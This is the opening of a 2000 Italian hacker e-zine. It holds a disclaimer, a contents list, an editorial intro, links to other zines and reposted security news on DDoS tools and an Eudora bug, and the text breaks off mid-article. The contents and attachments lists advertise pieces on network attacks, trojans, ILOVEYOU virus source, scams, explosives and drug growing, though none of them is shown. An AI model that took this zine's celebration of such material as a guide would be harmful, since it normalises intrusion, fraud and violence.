                  ____  ____  ____  ____  ____  _
               _ |___ \| __ \/ __ \|___ \/  __|| | _
              (_)/ __ ||    /| ___// __ || __ \| |(_)
                 \____/|_|\_\\____|\____/\____/|_|
  .:-!lAb0rAt0Ri0 ViRtUaLe 0kkUpAt0 & AuT0gEsTit0-z0nA fRaNcA!-:.
                          ./PreSeNTa:\.
                                _
                          ____ (_) ____
                       _ |___ \| |/ ___| _
                      (_)/ __ || |\___ \(_)
                         \____/|_||____/
                     !ANARCHY_IN_THE_SYSTEM!
       +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-
       -!!!-|HaCkInG|pHrEaKiNg|AnArChY|vIrIi|CrAcKiNg|-!!!-
         |CaRdInG|cRyPtO|sCaMmInG|pRoGrAmMiNg|ElEcTrOnIc|
         ^^^^|WaReZ|tRaShInG|dIsInFo|UnDeRgRoUnD|666|^^^^
             ^|CyBeRpUnK|cHeMiStRy|NaRcOs|FrEaK|Mp3|^
              ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
                        -=!!! aNNo 01 !!!=-
                          --[ NuMeRo3 ]--
                          -[gIuGnO 2000]-
                 _.-*\SpEcIaL hAcKmEeTiNg20o0/*-._


------------------------------------------------------------------[ iNtr0 ]---
===] DISCLAIMER LEGALE ]======================================================
-----[ LVOA AreA61 pR0duZiOnI cLanDeStiNe ]-----------------------------------

-Usa queste informazioni a TUO rischio e pericolo. Il Laboratorio Virtuale
 Occupato & Autogestito "Area61: Zona Franca" Produzioni Clandestine e
 qualsiasi altra persona o crew che abbia scritto articoli per questa E-Zine
 non si assumera' NESSUNA responsabilita' per l'uso o l'abuso delle infos
 contenute in questo testo.

-Le seguenti informazioni sono state scritte SOLAMENTE per scopo didattico,
 informativo e, per la maggiorparte delle volte, puramente RICREATIVO
 ed EDONISTICO, e NON possono ASSOLUTAMENTE essere usati per scopi illegali.
 Questa E-zine e' stata redatta semplicemente per DIVERTIRE il lettore. ;-)

-"AiS" si puo' considerare come un "magazine" dove viene pubblicato qualunque
 forma di informazione, nel pieno rispetto delle liberta' di parola, stampa e
 pensiero.

-Pertanto il Laboratorio Virtuale Occupato & Autogestito "Area61" non si 
 assume alcuna responsabilita' circa gli argomenti trattati in ogni singolo 
 articolo.
 La responsabilita e'SOLO ed ESCLUSIVAMENTE dell'autore, se ce ne dovesse
 essere bisogno, e se dovesse essere necessario o opportuno, ogni autore
 declinera' le responsabilita' in un disclaimer nei propri articoli.

-Informare non e' in alcun modo illegale. Non si incoraggia tuttavia, chi
 volesse usufruire delle informazioni contenute  per scopi illegali, o
 comunque non attinenti ai principi di civilta', di etica e morali.

-Leggendo questo file tu accetti i seguenti termini: Comprendo che usare le
 seguenti informazioni e' un atto illegale. Capisco e accetto di essere il 
 SOLO responsabile delle mie azioni. Se vengo messo nei guai da queste 
 informazioni NON incolpero' o tirero' nei guai coloro i quali hanno scritto 
 questo testo o ogni altro suo collaboratore o qualsiasi altra persona mi 
 abbia dato questo file. Io capisco che le informazioni qui contenute sono 
 SOLO per scopo didattico.

-Chi si dovesse ritenere offeso dagli argomenti divulgati in questo
 file ESCA SUBITO!!!!!!!!! e cancelli immediatamente questo documento dal
 proprio disco.

.:/ Il possesso di questo file, e' comunque del TUTTO LECITO \:.

_.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._
|_-_-_-_-_-_-_-_-!!!-=[ AnArChY|iN|tHe|SyStEm ]=-!!!-_-_-_-_-_-_-_-_|
|.-._.-._.-._.-._.-._.-._.uNiVeRsAl E-ZiNe-._.-._.-._.-._.-._.-._.-.|
+=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-+-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=+
|:.......................:InDeX_oF_cOnTeNtS:.......................:|
+=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-+-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=+
|/.\'/.\'/.\'/.\ArTiCoLo/.\'/.\'/./|\'/.\'/.\'/.\AuToRe/.\'/.\'/.\'\|
+-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=+=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-+
|<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<|
|>>>>>>>>>>>>>>>>>>>>>>>>>>> -=| iNTr0 |=- >>>>>>>>>>>>>>>>>>>>>>>>>|
|<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<|
+=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-+=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-+
|>-[ INTRO & NEWZ          ]------<*>----------------->OldirOn61<--<|
|>-[ L'ALTRO CYBERPUNK     ]------<*>-------->]CyBOrG[ OldirOn61<--<|
|>-[ GLI ALLEGATI          ]------<*>------------------------------<|
|>-[ IN DIRETTA DA DISINFO ]------<*>------->]CyB0rG[ The Jackal<--<|
+=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-+=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-+
|<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<|
|>>>>>>>>>>>>>>>>>>>>>>>>> -=| cYbErPunX |=- >>>>>>>>>>>>>>>>>>>>>>>|
|<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<|
+=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-+=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-+
|^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^] hAcKinG [^^^^^^^^^^^^^^^^^^^^^^|
|>-[ VULNERABILITA' IN NFS      ]-<*>-------------------->Vulcan<--<|
|>-[ ATTACCHI AL TCP/IP         ]-<*>-------------------->Davser<--<|
|>-[ CONSEAL FIREWALL TUTORIAL  ]-<*>----------------->WhITeFiRE<--<|
|>-[ TROJAN? -4 REALLY NEWBIES- ]-<*>------------------->Dmaster<--<|
|>-[ SFRUTTARE UNA SHELL -4 NB- ]-<*>-------------------->Falcon<--<|
|>-[ SICUREZZA PER BAMBINI      ]-<*>--------------------->Sash4<--<|
|>-[ BASI DI COLLEGAMENTO...    ]-<*>----------------->WhITeFiRE<--<|
|>-[ DESCRIZIONE DI UN ATTACCO. ]-<*>------------------->Kalidor<--<|
|>-[ GIUDIZIO DEI NAVIGATORI... ]-<*>---------------------->ZETA<--<|
|>-[ CLUSTERING & SQL           ]-<*>---------------->Maggiorana<--<|
|^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^] cRAcKinG [^^^^^^^^^^^^^^^^^^^^^|
|<-[ ADVANCED ZIP PASSWORD      ]->*<------------------>Quequero<-->|
|<-[ MINI-REVERSING DEL NOTEPAD ]->*<--------------------->Golem<-->|
|<-[ LADDOVE IL PROCDUMP ...    ]->*<------------------>Quequero<-->|
|^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^] pRoGrAmMinG [^^^^^^^^^^^^^^^^^^|
|<-[ C TUTORIAL     ]------------->*<---------------------->adr3<-->|
|<-[ IL SUBCLASSING ]------------->*<-------------->R A M S E S<--->|
|^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^] deMo-CoDinG [^^^^^^^^^^^^^^^^^^|
|<-[ PICCOLI DEMO CON IL PC ]----->*<-------------------->Orka4n<-->|
|<-[ EFFETTI: IL PLASMA     ]----->*<-------------------->Orka4n<-->|
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^] pHrEAKinG [^^^^^^^^^^^^^^^^^^^^^|
|<-[ SEGRETERIE TELEFONICHE ]----->*<------------------>mR_bIs0n<-->|
|^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^] pHrEAKinG/Old info$ [^^^^^^^^^^^|
|<-[ ASSALTO DELLE CABINE   ]----->*<-------------------->/zOKA/<-->|
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^] pHrEAKinG/Cellulars [^^^^^^^^^^^|
|<-[ FAKE SMS            ]-------->*<------------------>mR_bIs0n<-->|
|<-[ RICARICARE IL CELL. ]-------->*<------------------>mR_bIs0n<-->|
|^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^] vIrIi [^^^^^^^^^^^^^^^^^^^^^^^^|
|<-[ I LOVE YOU TUTORIAL  ]------->*<---------------------->Away<-->|
|<-[ I LOVE YOU DEBUGGING ]------->*<---------------------->ValK<-->|
|^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^] hArDwArE [^^^^^^^^^^^^^^^^^^^^^|
|>-[ EVOLUZIONE DEI CPU ]---------<*>----------------->H4mBuck3r<--<|
|^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^] hAck-it00 [^^^^^^^^^^^^^^^^^^^^|
|>-[ SPECIAL HACK-IT 00 ]---------<*>----------------->OldirOn61<--<|
|>-[ HACK-IT RESUME     ]---------<*>------------------>Quequero<--<|
|>-[ KALKUTTA'S STORY   ]---------<*>------------------>Quequero<--<|
|>-[ I COMMENTI         ]---------<*>----------------->OldirOn61<--<|
+=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-+=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-+
|<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<|
|>>>>>>>>>>>>>>>>>>>>>>>> -=| g00dStuFf |=- >>>>>>>>>>>>>>>>>>>>>>>>|
|<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<|
+=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-+=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-+
|^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^] dEsTr0Y! [^^^^^^^^^^^^^^^^^^^^^|
|<-[ LIGHTERS OVERCLOCKING     ]-->*<------------------>]CyB0rG[<-->|
|<-[ IL PLASTICO FATTO IN CASA ]-->*<----------------->The Raven<-->|
|<-[ FLAMETHROWER TRAP.        ]-->*<--------------------->X_Ted<-->|
|<-[ INNESCHI PER ESPLOSIVI    ]-->*<----------------->The Raven<-->|
|<-[ TV IN TILT??              ]-->*<------------------>]CyB0rG[<-->|
|^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^] sKamMiNg [^^^^^^^^^^^^^^^^^^^^^|
|<-[ SPEDIRE POSTA A L.0 ]-------->*<------------------>mR_bIs0n<-->|
|<-[ BUS SKAMMING        ]-------->*<----------------->The Raven<-->|
|<-[ TRUFFA POSTALE      ]-------->*<------------------>mR_bIs0n<-->|    
|^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^] gArDenInG [^^^^^^^^^^^^^^^^^^^^|
|<-[ MODALITA' DI SEMINA ]-------->*<-------------------->sP3nky<-->|
|^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^] nArCoS [^^^^^^^^^^^^^^^^^^^^^^^|
|<-[ DISTINZIONE DEI SESSI ]------>*<----------------->OldirOn61<-->|
|^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^] ThInKinG [^^^^^^^^^^^^^^^^^^^^^|
|<-[ THE DIFFERENCE MACHINE ]----->*<--------------------->aWAy3<-->|
|<-[ UN PO' DI ETICA        ]----->*<---------------------->ValK<-->|
|^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^] alT.mUsIk [^^^^^^^^^^^^^^^^^^^^|
|<-[ COSTRUIAMO UN DIDGERIDU ]---->*<-------------------->sP3nky<-->|
+=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-+=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-+
|<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<|
|>>>>>>>>>>>>>>>>>>>>>>>>>>> -=|0uTr0 |=- >>>>>>>>>>>>>>>>>>>>>>>>>>|
|<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<|
+=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-+=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-+
|<-[ HOTWEB       ]--------------->*<------------------>]CyBOrG[<-->|
|<-[ ROMA - CS(OA)]--------------->*<-------------------->sP3nky<-->|
|<-[ LINKS        ]--------------->*<------------------------------<|
|>-[ OUTRO        ]---------------<*>----------------->OldirON61<--<|
|<-[ CONTACTS     ]--------------->*<------------------------------>|
|>-[ LISTA E-MAIL ]---------------<*>------------------------------<|
+=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-+=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-+
._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-.

------------------------------------------------------------------[ iNtr0 ]---
===] INTRO AIS#3 ]============================================================
-----[ LVOA AreA61 pR0duZiOnI cLanDeStiNe ]-----------------------------------


=] InTrO & NeWz [=

Salve a tutti e benvenuti al numero 3 della nostra e-zine!!!
Sono molto felice di avervi ancora qui, e sono soprattutto contentissimo di
essere arrivati al numero3 (che in realta' e' il 4)
Da questo numero, ais cerchera' di mantenere una periodicita' bimestrale...
Questo vuol dire che (forse) ci saranno meno articoli, ma di sicuro in un anno
riusciremo a redarre un numero abbastanza valido (6 + eventuali speciali) di
uscite.

Purtroppo, a causa di impegni con la "vita reale" il sottoscritto (OldirOn61)
non e' riuscito a collaborare come voluto a questa e-zine...mi sono limitato
a fare un paio di articoli di "cazzeggio", il resoconto dell'hack-it, e la
"costruzione" generale dell'e-zine.
Mi scuso con tutti quelli che hanno collaborato, in effetti non ho dato un
ottimo esempio, ma prometto (giurin giurello) che nel numero4 il nome di
OldirOn61 sara' molto + presente...

Le novita' + grandi, oltre al "continuo" restyling del sito di Area61, e' la
nascita di una nuova Mailing List, e di un NewsGroup...alla fine di questo
file ci sono tutti i contatti.

Inoltre (MESSAGGIO PROMOZIONALE) vorrei segnalare che e' nato il canale 
#area61 presso il server di AzzurraNet (Chat.jodler.net) e vorrei spezzare una
lancia proprio a favore di questo server...
Azzurranet e' un paradiso per chi sta in IRC solo per chattare e per divulgare
info: Non servono bots, in quanto c'e' Chanserv che "detiene" il canale, non 
ci sono riski di Take-Over, se il canale e' vuoto, il primo che entra, 
almenoche' non e' registrato dal canale stesso, non avra' l'op, i nick possono
essere lunghi 30 caratteri, il topic di 5 righe....insomma un paradiso 
terrestre, anzi, virtuale!!! ;-) Colgo l'occasione per salutare il Duka, 
Mayhem e tutti quelli di #ahccc...
C'e' anche la radio ufficiale: RadioJodler (ns1.tdonline.net:8300)

Dopo questa piccola pubblicita' vi lascio alla lettura di AiS3, dai contenuti
sempre + disparati, anche se stiamo cercando, tralasciando gli articoli di
"cazzeggio", di dare alla nostra produzione un carattere + tecnico, senza mai
dimenticare la sfera "NewBies"...

Ah, dimenticavo....

Questa zine ha una lunghezza massima di 78 colonne (Visualizzabile
CORRETTAMENTE anche con una risoluzione minima di 640x480 pixels, con
qualunque comune EDITOR...) e quindi,TUTTI I CODICI (C, ASM, VB, ETC.ETC.)
potrebbero non funzionare, considerato che per la maggiorparte delle volte
siamo stai costretti a mandarli a capo
(non stavano nelle 78 colonne canoniche).... pertanto, se siete amanti del
COPIA/INCOLLA, dovete tribolare un po' di piu'!!!! ;-)

Buona Lettura a tutti, belli e brutti!

pS.
Preparatevi a leggere anche "AiS" (Anarchy in the Summer), la versione
"pazza" di AiS, con poca tecnica e molto, anzi moltissimo SPASSO!!! ;-)

---OldirOn61---


------------------------------------------------------------------[ iNtr0 ]---
===] L'ALTRO CYBERPUNK ]======================================================
-----[ Quequero ]-------------------------------------------------------------

Come al solito diamo uno sguardo a quello che fanno i nostri "cugini" in 
italia

=] SpiPPolatori [=

    http://www.spippolatori.com

E' uscito NetRunners12, nota rivista made in Spp... il ridlle va sempre + 
avanti (ormai non riesco + a starvi dietro...)

=] S0ftPr0ject & bFi Staff [=

    http://www.s0ftpj.org


=] NewBies [=

   http://www.spippolatori.com (mirror) [ A breve sara' disponibile il sito ]
                                        [ ufficiale                         ]

E'uscita Newbies6 (downloadabile su http://adryana.cjb.net), la grande rivista
redatta dai mitici Nobo & Dantuzzo.
Qualche errore (Vi siete dimenticati di eliminare il memorandum dallo zip!,
inoltre manca il file "coltivala.zip" ;-P) ma comunque sia, errori o no,
e' sempre una delle e-zine + belle d'italia... sempre + articoli, sembra
quasi un'enciclopedia, sempre + nozioni tecniche... MITICI!!!!!

Messaggio per il Nobo:

"Tu molla newbies ed internet ed io ti vengo a cercare con un macete! a buon
 intenditor poche parole!!!!!! Parola di OldirOn61!"

Per concludere un grande saluto a tutta la combriccola di Newbies, aspetto con
ansia il numero7, visto e considerato che il 6 l'ho gia' divorato!

=] Attila_Clan [=

Attila_Clan e' disponibile su http://attilahack.cjb.net

Non ci sono grosse novita', a parte una Mailing List sempre molto attiva 
(anche se molte volte ultimamente si e' dato largo spazio alle flames...)
ed una scissione che adesso vi illustrero'...
Un tempo nominato AttilaHack, il gruppo si e' "sfaldato" in due clan:
Attila Clan e i NetKnights...

=] NetKnights [=

E' nata un nuova crew con progetti abbastanza interessanti, si chiama
NetKnights maggiori info al sito

http://netknights.cjb.net/

=] UIC [=

    http://www.uic-spippolatori.com

Il sito di Quequero, "rettore" della UIC, e' disponibile ad un nuovo URL:
nato da un regalino degli Spp...
Il vecchio sito cmq (http://quequero.cjb.net) verra' utilizzato come mirror.
Per la cronaca e' inziato il 8 corso, ed il 5 corso per newbies...in piu'
sono aggiornate le pagine dedicate al Linux_Reversing ed al PSX_Cracking....
Oltre alla foto dell'area51, e' disponibile il log del meeting, e il "resume"
dell' hack-it00 (Lo trovate anche su questo numero di AiS)

=] SpaghettiPhreakers [=

Il sito, dopo il noto attacco da parte di Hack~Nirvana, e' disponibile presso

http://www.spaghettiphreakers.softitaly.com

Nuovo stile, anche se purtroppo Cdp, principale fautore di SP, e' costretto
a mollare la propria produzione, a causa del servizio di leva.
C'e' anche l'attiva (anzi attivissima) ML, presso il server di egroups.
Un saluto a Prodigy e a tutta la SpaghettiPhreakers Crew!

=] X-Brain [=

E' nata dalla colalborazione tra T0rment0 e Techno Knight una nuova zine,
molto ben curata: si chiama Xbrain ed  disponibile presso

http://www.whi.cjb.net/


=] Ninfo [=

Molti di voi si chiedono dove sia finito Avatar... ...beh, adesso ha un po'
messo da parte bombe e simili per dedicarsi a un'ezine aperiodica di
disinformazione(grande Avatar!) reperibile presso il sito di Lopks (al quale
mando un saluto ;-)

http://come.to/lopks

---OldirOn61*]CyBOrG[---


  +[ Gli aLlEgAti ]+

-conseal_crash.zip -> Script descritto nell'articolo di WhITeFiRE
-       iloveu.zip -> Codice sorgente del Virus "I love you" 
                      Commentato da away3
-    valkloveu.zip -> Codige sorgente (senza commenti) art. di ValK
-    didgeridu.zip -> I Suoni del didgeridu (art. di sP3nKy)
-       memory.zip -> "Patch in Memory" Articolo di Quequero
-       unpack.zip -> "Unpack" Articolo di Quequero (bis)

------------------------------------------------------------------[ iNtr0 ]---
===] IN DIRETTA DA DISINFO ]==================================================
-----[ ]CyBOrG[ & The Jackal ]------------------------------------------------


DiSiNf0  una agenzia (dis)informativa autonoma, tenendo conto
che i media ufficiali pubblicano solo cio' che ritengono opportuno,
cio' che ritengono 'far notizia', cio' che vogliono farci sapere
mirando bene a neutralizzare la veriticita' delle notizie o a
manipolarle a loro piacere... ci proponiamo di aggiornarvi con 
notizie selezionate, da ritagli di carta (di stampe alternative) 
e pagine elettroniche, notizie che difficilmente  i media ufficiali 
trattano o, se lo fanno, notizie cui viene dato uno spazio infimo
atto solo a riempire gli spazi vuoti delle loro futili testate.
Da questo numero, per problemi di tempo, siamo costretti a non poter
piu' scrivere da noi gli articoli di questa sezione ma cio' non vuol
dire che dovrete rinunciarvi, infatti, avrete modo di leggere comunque
le notizie che da oggi verrano direttamente cut/pastate dai siti
di informazione alternativa quali: Zeus News, Strano Network, Indy Media
Punto informatico, Apogeonline, Speaker Korner, Chl, Mediamente, 
Kontrokultura, Mondo Underground, Neural...
...le news sono selezionate da ]CyB0rG[ e The Jackal.



+--< Microsoft e IBM implicati in Echelon >--+ ]25/02/2000[ InTeLlIGeNcE ]

Secondo Duncan Campbell, relatore davanti alla Commissione del Parlamento 
europeo per le libert e i diritti dei cittadini, la giustizia e gli affari 
interni, nell'ambito dell'audizione su "l'Unione europea e la protezione 
dei dati" 

http://wwwdb.europarl.eu.int/ep/owa/
         p_calag.oj?ipid=495407&imn=9976&ilg=IT&iorig=sg/tree

i computer prodotti dalla IBM e dotati di sistemi operativi Microsoft 
sarebbero equipaggiati con un microsistema di ascolto. I dati raccolti 
sulle attivit commerciali e militari dei paesi concorrenti verrebbero 
monitorati all'interno del progetto Echelon, di cui avevamo parlato nelle 
ZEUS News del 29 gennaio.
Dell'organizzazione di monitoraggio farebbe parte anche il Regno Unito, 
nonostante la secca smentita di Tony Blair dopo l'incontro a Bruxelles con 
il presidente della Commissione Ue Romano Prodi.
In base a queste considerazioni, diventa meno contraddittoria l'attenzione 
dei politici americani per il processo antitrust di Washington, di cui si 
sta svolgendo l'ultima udienza, dal momento che il  monopolio mondiale 
della Microsoft nei sistemi operativi  probabilmente servito agli Stati 
Uniti per le proprie attivit spionistiche.
Proprio i sospetti di possibili infiltrazioni ha indotto recentemente il 
governo cinese ad equipaggiare i computer di tutto l'apparato 
amministrativo con il sistema operativo Linux.


+--< Cyberpirati? da oggi e' piu' facile >--+ ]25/02/2000[ Cyberwar ]

Una nuova versione del software che ha paralizzato diversi siti nelle 
scorse settimana permette ai pirati di lanciare i loro attacchi da un 
normale PC con sistema operativo Windows. In una relazione presentata a San 
Jose in California, si dice che il nuovo "zombie" software da' la 
possibilta' ai pirati di lanciare un attacco di tipo "coordinated 
distributed denial of service" verso qualsiasi obbiettivo, da un semplice 
PC con Windows, invece che da potenti server Unix.
Gli attacchi effettuati tramite il sistema DDoS possono paralizzare un 
computer, bombardandolo con un enorme numero di richieste nello stesso 
momento. Nella stessa relazione si dice che il nuovo software puo' essere 
trasmesso via e-mail come un normalissimo trojan, e in seguito pilotato da 
remoto, in modo simile a come gia' accadeva qualche tempo fa fa con il 
software "Back Orifice".
Il fatto che software di questo tipo sia disponibile anche per piattaforme 
Windows significa che lanciare un attacco DDoS sara' ancora piu' facile di 
prima, visto che il sitema operativo sviluppato dalla Microsoft e' il piu' 
diffuso al mondo.


+--< SIAE+GdF=!!! >--+ ]08/03/2000[ Censura ]

Tratto dal quotidiano economico "Italia Oggi":

"La Siae, la direzione centrale di polizia criminale per la polizia 
di stato, il comando generale dell'arma dei carabinieri e il corpo 
della guardia di finanza hanno dato avvio a un'importante intesa 
contro la pirateria multimediale.
A renderlo noto  stata la stessa societ italiana autori ed editori
con un comunicato stampa. <<Scopo dell'intesa>>, si legge nel 
comunicato diramato dalla Siae, << collaborare, mettendo in comune 
le rispettive conoscenze ed esperienze, per contrastare le attivit
criminose nel settore dei marchi e delle opere dell'ingegno tutelate,
in particolare della pirateria audiovisiva e informatica>>.
Il progetto trover applicazione pratica attraverso due direttrici:
- a livello centrale, con un costante monitoraggio del fenomeno della
pirateria, mediante lo scambio e l'interazione di tutti i dati 
disponibili e con l'invio conseguente di direttive ai rispettivi 
organismi locali; 
- a livello periferico, con una sinergica attivit operativa tra le
articolazioni provinciali delle forze di polizia e della Siae per 
un'azione di contrasto pi efficace e mirata."


+--< Combattere i crimini informatici >--+ ]15/03/2000[ Computercrime ]

Il dipartimento di giustizia degli Stati Uniti ha messo in Rete un nuovo 
sito(www.cybercrime.com) per diffondere informazioni sulle iniziative 
intraprese per combattere il crimine informatico. Il nuovo sito fornisce 
notizie di vario genere a diversi livelli di approfondimento, che potranno 
essere utilizzate tanto nelle spiegazioni scolastiche che nelle procedure 
legali. Vengono diffuse informazioni sull'hacking, sulle violazioni alla 
propriet intellettuale (problemi legati alla contraffazione e pi in 
generale al commercio elettronico), la libert di parola (problematiche 
riguardo discorsi che incitano all'odio - specialmente razziale, ma 
anche riguardo la diffusione di informazioni sulla costruzione di bombe), 
la crittografia e la privacy. Martha Stansell-Gamm, capo della sezione 
crimini informatici del dipartimento di Giustizia americano, ha 
commentato: "Rendendo agevole l'accesso ai materiali, speriamo d'informare
il pubblico sulle leggi speciali sui crimini informatici. Essere connessi
al World Wide Web facilita anche il nostro lavoro in collaborazione con 
le autorit giudiziarie di tutto il mondo".


+--< Europa: entreremo nei vostri computer >--+ ]02/05/2000[ Bug ]

Londra e Bruxelles negli ultimi giorni hanno assestato un poderoso uno-due 
alla libert digitale. Da Downing Street  infatti arrivata la conferma di un 
progetto da 75 miliardi di lire per consentire alle forze di sicurezza di 
entrare facilmente nelle email che vengono inviate e ricevute dai sudditi del
Regno Unito. 
E da Bruxelles arrivano i primi segnali di intesa in ambito europeo sulla 
lotta al crimine informatico, lotta il cui mezzo principale pare essere la 
possibilit di perquisire i computer degli utenti internet "a distanza", con 
tutti gli annessi e connessi sul piano tecnico. Ma andiamo con ordine. Stando
alle notizie provenienti da Londra, il progettone del governo  in fase 
avanzata di realizzazione, tanto che sar attivato entro la fine dell'anno. 
La sede del "Government Technical Assistance Center" sar all'interno del 
quartiere generale dei servizi segreti britannici a Londra. L'idea di fondo 
quella di consentire alla polizia di entrare facilmente nelle comunicazioni 
elettroniche "al solo fine investigativo". Di fronte all'alzata di scudi delle
associazioni dei consumatori e della difesa della libert digitali, che 
ritengono gravissimo il piano del governo, un portavoce degli interni ha 
affermato che "non c' modo per i servizi di sicurezza di monitorare la posta
elettronica di ciascuno. Il sistema  pensato solo per assistere le attivit 
investigative. Ogni intercettazione sar ottenuta esattamente come accade oggi
per altri strumenti, ovvero attraverso un mandato che dev'essere firmato dal 
ministro degli Interni". La seconda parte di quanto accaduto durante questo 
lungo e poco tranquillo weekend di paura arriva da Bruxelles. I 41 paesi del 
Consiglio d'Europa, infatti, sembrano vicini ad approvare un progetto di 
convenzione per combattere il crimine informatico. L'idea  quella di 
coordinare gli sforzi delle autorit di sicurezza dei singoli paesi e di 
attivare una serie di nuovi strumenti tra cui la "perquisizione informatica a
distanza". Con questa definizione si intende lo sviluppo di tecnologie e 
procedure di controllo, che dovranno evidentemente essere sviluppate e 
imposte ai fornitori di servizi internet, che consentano alle polizie di 
"perquisire" i computer di chi  sotto inchiesta anche da remoto, ovvero 
senza pervenire alle perquisizioni e ai sequestri tradizionali. E' ancora 
presto per capire come si evolver questo schema di intesa e quali passi 
saranno intrapresi per assicurare alle forze dell'Ordine queste nuove 
possibilit, ma se quella di Londra  una scelta, forse siamo di fronte al 
modello che dalle isole britanniche potrebbe scendere sul Continente per 
strangolarlo.


+--< Occhio, Eudora  bacata >--+ ]03/05/2000[ Bug ]

Eudora espone i suoi utenti ad un grave problema di sicurezza. 
L'ha confermato anche la "mamma" del celebre programmone di gestione della
posta elettronica, Qualcomm. Pare proprio che sia possibile, e molto 
facilmente, inviare ad un utente di Eudora su Windows un file eseguibile 
senza che il sistema se ne accorga e avverta l'utente della sua potenziale
pericolosit. Per fare questo  sufficiente modificare l'estensione del 
file da .exe a .lnk. Cos facendo Eudora non fa partire l'avvertimento 
sulla vera natura del file stesso.
Il bug l'ha trovato quello smanettone di Bennett Haselton di Peacefire, 
gi noto per le sue attivit sui software Microsoft, che ha dimostrato 
quanto sia facile inviare un file distruttivo ad un utente Eudora.
Stando al direttore tecnico di Eudora, Jeff Backley, siamo di fronte 
"ad una via per bypassare le capacit di avvertimento del programma". 
Per questo l'estensione .lnk sar inserita nella lista dei file che 
chiedono un check all'utente quando arrivano come attachment nei messaggi 
di email. Ma questo accadr nella versione 4.3.2 del programma prevista 
solo tra qualche settimana.
Nel frattempo chi si vuole cautelare pu seguire due strade. 
Se dispone di una versione di Eudora 4.2 o successive, pu copiare la 
stringa 

"x-Eudora-option:WarnLaunchExtensions=exe|com|bat|cmd|pif|htm|do|xl|reg|lnk|" 

all'interno del file Eudora.ini sulla linea "Settings". In questo modo 
l'estensione .lnk viene aggiunta tra quelle "a rischio".


+--< Allarme Mstream, supercodice di aggressione >--+ ]03/05/2000[ Cyberwar ]

Dave Dittrich, amministratore di sistema della Universit di Washington, 
ha lanciato l'allarme per quello che definisce un tool di attacco cyber 
molto pi pericoloso dei vari Trinoo, TFNK2 e via dicendo. Un tool che 
potrebbe rendere pi semplici e letali attacchi come quelli che lo scorso
febbraio hanno portato gi i server di Yahoo e Amazon.
Secondo Dittrich, che gode di enorme ascolto tra gli esperti di sicurezza,
Mstream consente di realizzare aggressioni contro server web pi pesanti 
dei DDoS (Distributed Denial of Service) "tradizionali" e con un numero 
minore di server da cui vengono fatti partire i messaggi per mandare in 
tilt "il computer vittima".
In una analisi di Mstream si rileva che il programma, che sta girando 
sulla rete,  ancora nelle prime fasi del suo sviluppo. E i danni che 
potrebbe procurare non riguardano solo il computer vittima ma anche i 
server utilizzati per colpire. Mstream per riuscire in questo conta sulle
tecniche di "egress filtering", tradizionalmente pensate per consentire 
ai server di scartare i pacchetti inviati nell'attacco. "Stimolata", 
questa tecnica pu finire per portare gi anche il sito internet del 
server utilizzato per inviare l'attacco.
Secondo Dittrich occorre iniziare a pensare che per sconfiggere i DDoS 
